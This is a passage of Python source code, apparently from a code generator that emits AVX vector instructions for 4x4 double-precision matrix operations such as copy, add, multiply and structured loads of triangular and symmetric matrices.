rows = [ mm256BlendPd(r3to1, vs[0], (1,0,0,0)) ]
r3to2 = mm256Permute2f128Pd(vs[1], vs[2], (0,0,1,0,0,0,0,0))
rows.append( mm256BlendPd(mm256PermutePd(r3to2, (0,1,1,0)), vs[0], (1,0,0,0)) )
rows.extend(vs[2:])
else:
r2to1 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
r3p4i = mm256ShufflePd(vs[2], vs[3], (0,0,0,0))
rows = [ mm256Permute2f128Pd(r2to1, r3p4i, (0,0,1,0,0,0,0,0)) ]
r3p4ii = mm256ShufflePd(vs[2], vs[3], (0,0,1,1))
rows.append( mm256Permute2f128Pd(vs[1], r3p4ii, (0,0,1,0,0,0,0,0)) )
rows.append( mm256BlendPd(vs[2], r3p4ii, (1,1,0,0)) )
rows.append( vs[3] )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowSymm'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(rows, pcs)]
instructions.extend([comm] + instrs)
elif Symmetric.testUpper(mStruct, mAccess, M, N):
# elif mAccess == Map("{[i,j]->[j,i]: j<i}").union(Map("{[i,j]->[i,j]: j>=i}")):
#USymm
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i)]), range(i,M), isCompact) for i in range(0, M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(M-1)]), [M-1], isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
if M == 1:
rows = vs
elif M == 2:
rows = [ vs[0] ]
rows.append( mm256ShufflePd(vs[0], vs[1], (0,0,1,1)) )
rows.extend(vs[2:])
elif M == 3:
rows = [ vs[0] ]
r1to2 = mm256ShufflePd(vs[0], vs[1], (0,0,1,1))
rows.append( mm256BlendPd(r1to2, vs[1], (1,1,0,0)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
rows.append( mm256Permute2f128Pd(r1p2, vs[2], (0,0,1,1,0,0,0,1)) )
rows.append(vs[3])
else:
rows = [ vs[0] ]
r1to2 = mm256ShufflePd(vs[0], vs[1], (0,0,1,1))
rows.append( mm256BlendPd(r1to2, vs[1], (1,1,0,0)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
rows.append( mm256Permute2f128Pd(r1p2, vs[2], (0,0,1,1,0,0,0,1)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (1,1,0,0))
r3p4 = mm256ShufflePd(vs[2], vs[3], (1,1,0,0))
rows.append( mm256Permute2f128Pd(r1p2, r3p4, (0,0,1,1,0,0,0,1)) )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpSymm'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(rows, pcs)]
instructions.extend([comm] + instrs)
elif LowerUnitTriangular.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
lds = [ mm256SetzeroPd() ]
lds.extend( [mm256LoadGd(Pointer(src[sL.of(i+1),sR.of(0)]), range(i+1), isCompact) for i in range(M-1)] )
vs = []
for i,v in enumerate(lds):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(v, ones, imm) )
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowUnitTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif LowerTriangular.test(mStruct, mAccess, M, N):
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i+1), isCompact) for i in range(M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), range(M), isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif UpperUnitTriangular.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
lds = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i+1)]), range(i+1,M), isCompact) for i in range(M-1)]
lds.append( mm256SetzeroPd() )
vs = []
for i,v in enumerate(lds):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(v, ones, imm) )
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpperUnitTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif UpperTriangular.test(mStruct, mAccess, M, N):
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i)]), range(i,M), isCompact) for i in range(M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(M-1)]), [M-1], isCompact))
# vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i,M), isCompact) for i in range(M-1)]
# vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), [M-1], isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpperTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif AllEntriesConstantMatrix.test(mStruct, mAccess, M, N):
const_value = mStruct.keys()[0]._const_value
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
if mParams['bcast']:
va = mm256Set1Pd(V(const_value))
else:
va = mm256SetPd(V(0), V(0), V(0), V(const_value))
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif N == 1 or M == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
consts = [ V(0) for _ in range(nu-max(M,N)) ] + [V(const_value) for _ in range(max(M,N))]
va = mm256SetPd(*consts)
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
else:
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
consts = [ V(0) for _ in range(nu-N) ] + [V(const_value) for _ in range(N)]
va = mm256SetPd(*consts)
vas = [ va for i in range(M) ]
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGd(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGd(mm256SetzeroPd(), pcs[i], range(nu)) for i in range(M,nu) ]
elif IdentityMatrix.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
zeros = mm256SetzeroPd()
vs = []
for i in range(M):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(zeros, ones, imm) )
for i in range(M,4):
vs.append( zeros )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'Identity'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
return instructions
class _Dbl4BLAC(object):
def __init__(self):
super(_Dbl4BLAC, self).__init__()
def Zero(self, dParams, opts):
nu = 4
dst = dParams['nuM']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: Zero " + str(M) + "x" + str(N)) ]
if M*N == nu:
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SetzeroPd(), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SetzeroPd(), pc, range(nu))
instructions += [ instr ]
return instructions
def Copy(self, sParams, dParams, opts):
nu = 4
# these are the 3 Matrix objects involved
src, dst = sParams['nuM'], dParams['nuM']
# these are the index functions for the two dimensions of each of the matrices
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
# these are the sizes of the matrices
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: Copy " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), [0, 1, 2, 3])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(va, pc, [0, 1, 2, 3])
instructions.append(instr)
elif M == nu and N == nu:
vas = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3]) for i in range(4)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
instrs = [mm256StoreGd(va, pc, [0, 1, 2, 3]) for va, pc in zip(vas, pcs)]
instructions.extend(instrs)
for i in instructions:
i.bounds.update(dParams['bounds'])
return instructions
def Add(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " + " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def Neg(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: -( " + str(M) + "x" + str(N) + " )") ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(mm256SetzeroPd(), va), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(mm256SetzeroPd(), va), pc, range(nu))
instructions += [ instr ]
return instructions
def Sub(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " - " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def _Div(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " / " + str(M) + "x" + str(N)) ]
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
# instr = mm256StoreGd(mm256DivPd(va, vb), pc, range(nu))
instr = mm256StoreGd(mm256CastPd128Pd256(mmDivPd(mm256CastPd256Pd128(va), mm256CastPd256Pd128(vb))), pc, range(nu))
instructions += [ instr ]
return instructions
def _Sqrt(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: sqrt(" + str(M) + "x" + str(N) + ")") ]
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
# instr = mm256StoreGd(mm256SqrtPd(va), pc, range(nu))
instr = mm256StoreGd(mm256CastPd128Pd256(mmSqrtPd(mm256CastPd256Pd128(va))), pc, range(nu))
instructions += [ instr ]
return instructions
# def LDiv(self, s0Params, s1Params, dParams, opts):
# nu = 4
# src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
# s0L, s0R = s0Params['nuML'], s0Params['nuMR']
# s1L, s1R = s1Params['nuML'], s1Params['nuMR']
# dL, dR = dParams['nuML'], dParams['nuMR']
# oN, M, N = s1Params['N'], s0Params['nuMM'], s1Params['nuMN']
# s0Struct = s0Params['struct']
# instructions = []
#
# instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(M) + " \ " + str(M) + "x" + str(N)) ]
# if M == 1:
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# if oN > 1:
# dupa00 = mm256UnpackloPd(va0, va0)
# va0 = mm256Permute2f128Pd(dupa00, dupa00, [0,0,1,0,0,0,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# instructions += [ mm256StoreGd(mm256DivPd(vb, va0), pc, range(nu)) ]
# else:
# if s0Struct[Matrix] == Set("{[i,j]: 0<=i<"+str(M)+" and 0<=j<=i}") and s0Struct[ZeroMatrix] == Set("{[i,j]: 0<=i<"+str(M)+" and i<j<"+str(M)+"}"):
# if N == 1: #trsv forward-sub
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
# va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
# va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# tmp0 = mm256UnpackloPd(va0, va1)
# tmp1 = mm256UnpackloPd(va2, va3)
# tmp2 = mm256UnpackhiPd(va0, va1)
# tmp3 = mm256UnpackhiPd(va2, va3)
# col0 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,0,1])
# col1 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,1,0])
# col2 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [0,1,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# d01 = mm256BlendPd(va0, va1, [0,0,1,0])
# d23 = mm256BlendPd(va2, va3, [1,0,0,0])
# diag = mm256BlendPd(d01, d23, [1,1,0,0])
# ones = mm256Set1Pd(sa(1.))
# rdiag = mm256DivPd(ones, diag)
# sol = mm256MulPd(rdiag, vb)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx0 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx0, dupx0, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx0 = mm256MulPd(rdiag, mm256MulPd(col0, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx0)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx1 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx1, dupx1, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx1 = mm256MulPd(rdiag, mm256MulPd(col1, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx1)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx2 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,1,0,0,0,1]) # Dup second lane
# cx2 = mm256MulPd(rdiag, mm256MulPd(col2, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx2)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# else: #trsm
# vas = [ mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu)]
# ones = mm256Set1Pd(sa(1.))
# ums = [ (mm256UnpackloPd,[0,0,1,0,0,0,0,0]), (mm256UnpackhiPd,[0,0,1,0,0,0,0,0]), (mm256UnpackloPd,[0,0,1,1,0,0,0,1]), (mm256UnpackhiPd,[0,0,1,1,0,0,0,1]) ]
# rdiags = [ ]
# for i in range(nu):
# upack, mask = ums[i]
# dupaii = upack(vas[i], vas[i])
# bcaii = mm256Permute2f128Pd(dupaii, dupaii, mask)
# rdiags.append(mm256DivPd(ones, bcaii))
# vbs = [ mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu)]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu)]
# #Solve X00, X01, X02, X03
# # dupa00 = mm256UnpackloPd(vas[0], vas[0])
# # sol = mm256DivPd(vbs[0], mm256Permute2f128Pd(dupa00, dupa00, [0,0,1,0,0,0,0,0]))
# sol = mm256MulPd(rdiags[0], vbs[0])
# instructions += [ mm256StoreGd(sol, pcs[0], range(nu)) ]
# #Solve X10, X11, X12, X13
# #bcast L10
# dupa10 = mm256UnpackloPd(vas[1], vas[1])
# bca10 = mm256Permute2f128Pd(dupa10, dupa10, [0,0,1,0,0,0,0,0])
# x0 = mm256LoadGd(pcs[0], range(nu))
# sol = mm256MulPd(rdiags[1], mm256SubPd(vbs[1], mm256MulPd(bca10, x0)))
# instructions += [ mm256StoreGd(sol, pcs[1], range(nu)) ]
# #Solve X2..
# #bcast L20, L21
# dupa20 = mm256UnpackloPd(vas[2], vas[2])
# bca20 = mm256Permute2f128Pd(dupa20, dupa20, [0,0,1,0,0,0,0,0])
# dupa21 = mm256UnpackhiPd(vas[2], vas[2])
# bca21 = mm256Permute2f128Pd(dupa21, dupa21, [0,0,1,0,0,0,0,0])
# x1 = mm256LoadGd(pcs[1], range(nu))
# sol = mm256MulPd(rdiags[2], mm256SubPd(mm256SubPd(vbs[2], mm256MulPd(bca20, x0)), mm256MulPd(bca21, x1)))
# instructions += [ mm256StoreGd(sol, pcs[2], range(nu)) ]
# #Solve X3..
# #bcast L30, L31, L32
# dupa30 = mm256UnpackloPd(vas[3], vas[3])
# bca30 = mm256Permute2f128Pd(dupa30, dupa30, [0,0,1,0,0,0,0,0])
# dupa31 = mm256UnpackhiPd(vas[3], vas[3])
# bca31 = mm256Permute2f128Pd(dupa31, dupa31, [0,0,1,0,0,0,0,0])
# dupa32 = dupa30
# bca32 = mm256Permute2f128Pd(dupa32, dupa32, [0,0,1,1,0,0,0,1])
# x2 = mm256LoadGd(pcs[2], range(nu))
# sol = mm256MulPd(rdiags[3], mm256SubPd(mm256SubPd(mm256SubPd(vbs[3], mm256MulPd(bca30, x0)), mm256MulPd(bca31, x1)), mm256MulPd(bca32, x2)))
# instructions += [ mm256StoreGd(sol, pcs[3], range(nu)) ]
# else:
# if N == 1: #trsv backward-sub
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
# va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
# va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# tmp0 = mm256UnpackloPd(va0, va1)
# tmp1 = mm256UnpackloPd(va2, va3)
# tmp2 = mm256UnpackhiPd(va0, va1)
# tmp3 = mm256UnpackhiPd(va2, va3)
# col1 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,1,0])
# col2 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [0,1,0,0])
# col3 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [1,0,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# d01 = mm256BlendPd(va0, va1, [0,0,1,0])
# d23 = mm256BlendPd(va2, va3, [1,0,0,0])
# diag = mm256BlendPd(d01, d23, [1,1,0,0])
# ones = mm256Set1Pd(sa(1.))
# rdiag = mm256DivPd(ones, diag)
# sol = mm256MulPd(rdiag, vb)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx3 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx3, dupx3, [0,0,1,1,0,0,0,1]) # Dup second lane: x3 x3 x3 x3
# cx3 = mm256MulPd(rdiag, mm256MulPd(col3, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx3)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx2 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,1,0,0,0,1]) # Dup second lane
# cx2 = mm256MulPd(rdiag, mm256MulPd(col2, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx2)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx1 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx1, dupx1, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx1 = mm256MulPd(rdiag, mm256MulPd(col1, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx1)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# else: #trsm
# vas = [ mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu)]
# ones = mm256Set1Pd(sa(1.))
# ums = [ (mm256UnpackloPd,[0,0,1,0,0,0,0,0]), (mm256UnpackhiPd,[0,0,1,0,0,0,0,0]), (mm256UnpackloPd,[0,0,1,1,0,0,0,1]), (mm256UnpackhiPd,[0,0,1,1,0,0,0,1]) ]
# rdiags = [ ]
# for i in range(nu):
# upack, mask = ums[i]
# dupaii = upack(vas[i], vas[i])
# bcaii = mm256Permute2f128Pd(dupaii, dupaii, mask)
# rdiags.append(mm256DivPd(ones, bcaii))
# vbs = [ mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu)]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu)]
# #Solve X30, X31, X32, X33
# sol = mm256MulPd(rdiags[3], vbs[3])
# instructions += [ mm256StoreGd(sol, pcs[3], range(nu)) ]
# #Solve X20, X21, X22, X23
# #bcast U23
# dupa23 = mm256UnpackhiPd(vas[2], vas[2])
# bca23 = mm256Permute2f128Pd(dupa23, dupa23, [0,0,1,1,0,0,0,1])
# x3 = mm256LoadGd(pcs[3], range(nu))
# sol = mm256MulPd(rdiags[2], mm256SubPd(vbs[2], mm256MulPd(bca23, x3)))
# instructions += [ mm256StoreGd(sol, pcs[2], range(nu)) ]
# #Solve X1..
# #bcast U12, U13
# dupa12 = mm256UnpackloPd(vas[1], vas[1])
# bca12 = mm256Permute2f128Pd(dupa12, dupa12, [0,0,1,1,0,0,0,1])
# dupa13 = mm256UnpackhiPd(vas[1], vas[1])
# bca13 = mm256Permute2f128Pd(dupa13, dupa13, [0,0,1,1,0,0,0,1])
# x2 = mm256LoadGd(pcs[2], range(nu))
# sol = mm256MulPd(rdiags[1], mm256SubPd(mm256SubPd(vbs[1], mm256MulPd(bca12, x2)), mm256MulPd(bca13, x3)))
# instructions += [ mm256StoreGd(sol, pcs[1], range(nu)) ]
# #Solve X0..
# #bcast U01, U02, U03
# dupa01 = mm256UnpackhiPd(vas[0], vas[0])
# bca01 = mm256Permute2f128Pd(dupa01, dupa01, [0,0,1,0,0,0,0,0])
# dupa02 = mm256UnpackloPd(vas[0], vas[0])
# bca02 = mm256Permute2f128Pd(dupa02, dupa02, [0,0,1,1,0,0,0,1])
# dupa03 = dupa01
# bca03 = mm256Permute2f128Pd(dupa03, dupa03, [0,0,1,1,0,0,0,1])
# x1 = mm256LoadGd(pcs[1], range(nu))
# sol = mm256MulPd(rdiags[0], mm256SubPd(mm256SubPd(mm256SubPd(vbs[0], mm256MulPd(bca01, x1)), mm256MulPd(bca02, x2)), mm256MulPd(bca03, x3)))
# instructions += [ mm256StoreGd(sol, pcs[0], range(nu)) ]
#
# return instructions
def Mul(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, K, N = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " * " + str(K) + "x" + str(N)) ]
if M == 1:
if N == 1:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
vmul = mm256MulPd(va, vb)
vper = mm256Permute2f128Pd(vmul, vmul, [1,0,0,0,0,0,0,1])
vadd0 = mm256AddPd(vmul, vper)
vble = mm256BlendPd(vadd0, mm256SetzeroPd(), [1,1,1,0])
vshu = mm256ShufflePd(vadd0, vadd0, [0,0,0,1])
vadd1 = mm256AddPd(vble, vshu)
instr = mm256StoreGd(vadd1, pc, range(nu))
instructions += [ instr ]
else:
vb0 = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
vb1 = mm256LoadGd(Pointer(src1[s1L.of(1),s1R.of(0)]), range(nu))
vb2 = mm256LoadGd(Pointer(src1[s1L.of(2),s1R.of(0)]), range(nu))
vb3 = mm256LoadGd(Pointer(src1[s1L.of(3),s1R.of(0)]), range(nu))
va00 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), [tuple(range(nu))])
va01 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(1)]), [tuple(range(nu))])
va02 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(2)]), [tuple(range(nu))])
va03 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(3)]), [tuple(range(nu))])
mul0 = mm256MulPd(va00, vb0)
mul1 = mm256MulPd(va01, vb1)
add0 = mm256AddPd(mul0, mul1)
mul2 = mm256MulPd(va02, vb2)
mul3 = mm256MulPd(va03, vb3)
add1 = mm256AddPd(mul2, mul3)
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(add0, add1), pc, range(nu))
instructions += [ instr ]
else:
if K == 1:
